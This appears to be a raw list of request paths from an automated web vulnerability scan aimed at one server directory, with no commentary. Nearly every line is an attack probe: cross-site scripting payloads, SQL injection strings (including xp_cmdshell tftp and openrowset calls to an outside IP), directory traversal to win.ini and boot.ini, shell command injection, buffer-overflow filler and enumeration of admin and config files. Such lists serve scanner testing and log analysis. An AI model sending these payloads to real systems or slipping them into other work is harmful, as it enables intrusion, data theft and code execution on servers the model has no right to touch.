/icons/%2E/small/?C=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(xss)>
/icons/%2E/small/?C=>"><%00script>alert(xss)</script>
/icons/%2E/small/?C=>"><script>alert(xss)</script>
/icons/%2E/small/?C=>%22%27><img%20src%3d%22javascriptt(xss)%22>
/icons/%2E/small/?C=>'><%00script>alert(xss)</script>
/icons/%2E/small/?C=>'><script>alert(xss)</script>
/icons/%2E/small/?C=>+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss)+AA0APB-/SCRIPT+AD7-
/icons/%2E/small/?C=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/%2E/small/?C=AVAK$(RETURN_CODE)OS
/icons/%2E/small/?C=Cdows\win.ini
/icons/%2E/small/?C=Cnt\win.ini
/icons/%2E/small/?C=Ct.ini
/icons/%2E/small/?C=D;O=A
/icons/%2E/small/?C=id|
/icons/%2E/small/?C=M;O=A
/icons/%2E/small/?C=N;O=D
/icons/%2E/small/?C=N;O=D"+alert(xss)+"
/icons/%2E/small/?C=N;O=D#&<(,+">;
/icons/%2E/small/?C=N;O=D%22%2Balert%2842067%29%2B%22
/icons/%2E/small/?C=N;O=D%27%2Balert%2842063%29%2B%27
/icons/%2E/small/?C=N;O=D%2Balert%2842071%29%2B
/icons/%2E/small/?C=N;O=D%a5'%20having%201=1--
/icons/%2E/small/?C=N;O=D%uFF07
/icons/%2E/small/?C=N;O=D&%3E%27%22%3E%3Cscript%3Ealert%2841963%29%3C%2Fscript%3E=123
/icons/%2E/small/?C=N;O=D&%3E%27%22%3E%3Cscript%3Ealert%2841967%29%3C%2Fscript%3E=123
/icons/%2E/small/?C=N;O=D'
/icons/%2E/small/?C=N;O=D'"WFXSSProbe)/>
/icons/%2E/small/?C=N;O=D'%20+%20'somechars
/icons/%2E/small/?C=N;O=D'%20and%20'barfoo'='foobar
/icons/%2E/small/?C=N;O=D'%20and%20'barfoo'='foobar'%20--
/icons/%2E/small/?C=N;O=D'%20and%20'barfoo'='foobar')%20--
/icons/%2E/small/?C=N;O=D'%20and%20'foobar'='foobar
/icons/%2E/small/?C=N;O=D'%20and%20'foobar'='foobar'%20--
/icons/%2E/small/?C=N;O=D'%20and%20'foobar'='foobar')%20--
/icons/%2E/small/?C=N;O=D'%20exec%20master..xp_cmdshell%20'vol'--
/icons/%2E/small/?C=N;O=D'%20having%201=1--
/icons/%2E/small/?C=N;O=D'%20or%20'foobar'='foobar
/icons/%2E/small/?C=N;O=D'%20or%20'foobar'='foobar'%20--
/icons/%2E/small/?C=N;O=D'%20or%20'foobar'='foobar')%20--
/icons/%2E/small/?C=N;O=D'%20||%20'somechars
/icons/%2E/small/?C=N;O=D'%20||%20UTL_HTTP.REQUEST('http2.168.1.147QL_Injection_Validation')%20||%20'
/icons/%2E/small/?C=N;O=D'+alert(xss)+'
/icons/%2E/small/?C=N;O=D';
/icons/%2E/small/?C=N;O=D';%20exec%20master..xp_cmdshell%20'tftp%20192.168.1.147%20GET%20SQL_Injection_Validation'--
/icons/%2E/small/?C=N;O=D';%20select%20*%20from%20dbo.sysdatabases--
/icons/%2E/small/?C=N;O=D';%20select%20*%20from%20master..sysmessages--
/icons/%2E/small/?C=N;O=D';%20select%20*%20from%20openrowset('sqloledb','Network=DBMSSOCN;Address=192.168.1.147,9999;uid=myUsr;pwd=myPass;timeout=5','select%20foo%20from%20bar')--
/icons/%2E/small/?C=N;O=D';%20select%20*%20from%20sys.dba_users--
/icons/%2E/small/?C=N;O=D';%20select%20@@version,1,1,1--
/icons/%2E/small/?C=N;O=D)%20having%201=1--
/icons/%2E/small/?C=N;O=D*/--></script><script>alert(xss)</script>
/icons/%2E/small/?C=N;O=D+alert(xss)+
/icons/%2E/small/?C=N;O=D1%20having%201=1--
/icons/%2E/small/?C=N;O=DWFXSSProbe
/icons/%2E/small/?C=N;O=D\'%20having%201=1--
/icons/%2E/small/?C=S;O=A
/icons/%2E/small/?C=somechars'%20+%20'N;O=D
/icons/%2E/small/?C=somechars'%20||%20'N;O=D
/icons/%2E/small/?C=WF'SQL"Probe;A--B
/icons/%2E/small/?C=\"
/icons/%2E/small/?C=\'
/icons/%2E/small/?C=\..\..\..\..\..\..\..\..\boot.ini
/icons/%2E/small/?C=\..\..\..\..\..\..\..\..\windows\win.ini
/icons/%2E/small/?C=\..\..\..\..\..\..\..\..\winnt\win.ini
/icons/%2E/small/?C=\u003Cscript\u003Ealert\u002842045\u0029\u003C/script\u003E
/icons/%2E/small/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini
/icons/%2E/small/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/icons/%2E/small/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/icons/%2E/small/?M=A
/icons/%2E/small/?S=D
/icons/%2E/small/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/%2E/small/admin.asp
/icons/%2E/small/admin.aspx
/icons/%2E/small/admin.cfg
/icons/%2E/small/admin.cfm
/icons/%2E/small/admin.cgi
/icons/%2E/small/admin.conf
/icons/%2E/small/admin.dat
/icons/%2E/small/admin.data
/icons/%2E/small/admin.htm
/icons/%2E/small/admin.html
/icons/%2E/small/admin.ini
/icons/%2E/small/admin.php
/icons/%2E/small/admin.php3
/icons/%2E/small/admin.pl
/icons/%2E/small/admin.pw
/icons/%2E/small/admin.shtml
/icons/%2E/small/admin.txt
/icons/%2E/small/admin.udl
/icons/%2E/small/adSamples/config/site.csc
/icons/%2E/small/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:")|
/icons/%2E/small/cgi-bin/htimage.exe?2,2
/icons/%2E/small/connect.asp?server=%3Cscript%3Ealert%2841681%29%3C%2Fscript%3E
/icons/%2E/small/CVS/
/icons/%2E/small/EDM-ViewController-context-root/browse.do?act=%3CSCRIPT%3Ealert(xss);%3C/SCRIPT%3E&amp;select=1177281
/icons/%2E/small/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert(xss)%3c%2fscript%3e
/icons/%2E/small/examples/SendMailServlet
/icons/%2E/small/examples/servlet/SnoopServlet
/icons/%2E/small/examples/servlet/TroubleShooter
/icons/%2E/small/exchange/forms/ipm/note/cmpTitle.asp?tab=%22%2Balert%2841523%29%3B%7D%20setImportance%281%29%3B%3C%2Fscript%3E&att=0&imp=1
/icons/%2E/small/global.asa+.htr
/icons/%2E/small/global.asax+.htr
/icons/%2E/small/global.asax\
/icons/%2E/small/global.asa\
/icons/%2E/small/globals.jsa
/icons/%2E/small/iissamples/exair/howitworks/codebrws.asp?source=/msadc/../../../../../boot.ini
/icons/%2E/small/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/iissamples/sdk/asp/docs/%c0%ae./%c0%ae./%c0%ae./%c0%ae./%c0%ae./%c0%ae./winnt/win.ini%c0%80.asp
/icons/%2E/small/iissamples/sdk/asp/interaction/ServerVariables_Jscript.asp
/icons/%2E/small/msadc/msadcs.dll
/icons/%2E/small/msadc/Samples/Selector/ShowCode.asp?source=/msadc/../../../../../boot.ini
/icons/%2E/small/nonExistentPage.asp
/icons/%2E/small/nonExistentPage.aspx
/icons/%2E/small/nonExistentPage.cfm
/icons/%2E/small/nonExistentPage.cgi
/icons/%2E/small/nonExistentPage.html
/icons/%2E/small/nonExistentPage.jhtml
/icons/%2E/small/nonExistentPage.jsp
/icons/%2E/small/nonExistentPage.msp
/icons/%2E/small/nonExistentPage.nsf
/icons/%2E/small/nonExistentPage.php
/icons/%2E/small/nonExistentPage.php3
/icons/%2E/small/nonExistentPage.php4
/icons/%2E/small/nonExistentPage.pl
/icons/%2E/small/nonExistentPage.shtml
/icons/%2E/small/Northwind?sql=SELECT+contactname,+phone+FROM+Customers+FOR+XML&root=<script>alert(xss)</script>
/icons/%2E/small/NR/System/Access/ManualLogin.asp?REASONTXT=<script>alert(xss)</script>
/icons/%2E/small/null.htw?CiWebHitsFile=/default.htm&CiRestriction="<script>alert(xss)</script>"
/icons/%2E/small/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/icons/%2E/small/null.htw?CiWebHitsFile=/global.asax%20&CiRestriction=none&CiHiliteType=Full
/icons/%2E/small/null.htw?CiWebHitsFile=/index.htm&CiRestriction="<script>alert(xss)</script>"
/icons/%2E/small/null.htw?CiWebHitsFile=/index.html&CiRestriction="<script>alert(xss)</script>"
/icons/%2E/small/order.htm
/icons/%2E/small/order.html
/icons/%2E/small/order.txt
/icons/%2E/small/output-build.txt
/icons/%2E/small/owa_util.listprint?p_theQuery=SELECT%20*%20FROM%20SYS.TAB&p_cname=&p_nsize=
/icons/%2E/small/owa_util.signature
/icons/%2E/small/pbserver/pbserver.dll?&&&&&&pb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA